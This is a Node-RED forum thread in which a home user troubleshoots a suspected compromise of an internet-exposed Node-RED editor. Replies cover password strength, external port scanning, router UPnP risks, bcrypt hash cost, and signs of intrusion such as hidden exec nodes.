LePotato device (Pi3 equivalent) running armbian 23.02
sudo and main user (the only one in fact)
No, password needed.
8 chars, letters upper and lower case + 2 special characters
Nope
1880
yes. I tried initially at set up to use another one on router 1 but I don't know why, there were somme issue with the https certificate. So everything was routed 1880->1880->1880
A few month.
Thanks. Yes, I meant 1880. Slip of the brain. 
Obligatory xkcd about password length
Sorry, one more question: Was the Node-red editor password protected?
Yes, Both nodered editor and dashboard were password protected.
Password were the same but different username
Had you checked that http access did not work?
We have not seen any cases of hacking (as far as we are aware) that required a password.
As far as I know http was not enabled.
But for sure I might have made a mistake somewhere in the configuration. Like I said I'm not an expert and basically did the config reading papers on the net.
That's also why I thought about the discord node because the coincidence of the timing was surprising and to me a hack with https enabled was unlikely. So there is probably something else.
Actually, if using brute force password guessing, which apparently can be broken in a few days with a 10 char pwd, using https won't help.
I am changing all my passwords now. 
Still dubious if someone would go to that length to crack some password on an individual.
@iznogoud320 did you verify all (open) ports from the outside ? with grc or some other service ?
Can confirm that there is more than one hacker. If you see a flow labeled "SpiderPig420" or have nodes hidden in the bottom right corner of a flow with an exec node to pull a bash script then you have been compromised. I have seen this across dozens of unsecured node-red servers that can be found with a simple Google dork.
Not surprising. They often work in groups - lone hackers are actually pretty rare. Sometimes they work at industrial scale, especially at the nation-state supported level.
Yes, and of course there are specialist tools that will discover these things anyway.
The price of success I'm afraid. Based on forum posts alone, I think we've seen a really big increase in numbers over the last year. So inevitable that hackers would eventually get wise even if at least one of them wasn't also into home automation!
Do you mean that a port could be open even if the router interface says it isn't?
I haven't tested from outside but the only port officially routed were 1880 for nodered and 80 for certbot. And that was only tested from inside. I mean I connected to router 1 locally with my mobile and tested the opened ports on router 2 with Net Analyzer on android.
There are plenty of port scanners - the grc.com site has one that can be trusted.
A badly configured router might expose various ports. That bad config might come from the router manufacturer or your ISP. Some routers for example exposed UPNP to the Internet which is easily hacked to open ports. Check for firmware updates and, if the routers are old and/or default ISP routers, consider whether they are still safe to use (do some internet searching, router vulnerabilities are generally well published over time). Also check that you aren't using default passwords on them.
Don't rely on a mobile device to do security scanning. There are too many other things going on that might interfere.
Hi Julian,
Could node-red-contrib-portscan be of any use for this. So that you run a scan from time to time and send a notification when unexpected ports open. I see that it is designed for LAN so not sure if it works to monitor a WAN port...
Of course you might say that it is not a good idea to run such a scan from Node-RED, because once Node-RED is compromised they can stop the scanning. However you can also say: if the scan has always been ok, then your hack won't be caused by an (incorrect) open port so it doesn't matter anymore if they stop the scan. Or am I mistaken somehow?
I'm afraid not for router scans. Unless you are scanning someone else's router of course or running Node-RED on a cloud server so that you can scan your wan ports - but that is a bit of a circular issue!
What you could do would be to have a flow that uses one of the scan services from time-to-time. That would work. Or there are doubtless plenty of services out there that will do this kind of thing for you. If you are lucky enough to be part of the UK public sector, including the NHS, you can use the National Cyber Security Centre's fantastic services that periodically check defined endpoints for issues. 
If you were using a hashed password, did the hash begin with $2b$08? If you must expose anything with a password, then at least hash it with a higher cost. You could probably use 15 or higher on your setup, if you don't mind being slowed down ever so slightly when logging in. The built-in node-red admin hash-pw seems to only use 8 rounds, which is a little too low for modern hardware. Hashing the password yourself and using a higher cost won't stop the brute force, but it might slow the baddies and give you a little time to notice the attempt to gain access.
Or better still, just don't use it at all and use a 3rd-party tool to secure access to the Editor properly.
Exactly this ...
I don't know and I haven't kept a copy of nodered settings to check .
But yes i did use nodered tool to hash it.
Copyright OpenJS Foundation and Node-RED contributors. All rights reserved. The OpenJS Foundation has registered trademarks and uses trademarks. For a list of trademarks of the OpenJS Foundation, please see our Trademark Policy and Trademark List. Trademarks and logos not indicated on the list of OpenJS Foundation trademarks are trademarksā¢ or registeredĀ® trademarks of their respective holders. Use of them does not imply any affiliation with or endorsement by them.
The OpenJS Foundation | Terms of Use | Privacy Policy | OpenJS Foundation Bylaws | Trademark Policy | Trademark List | Cookie Policy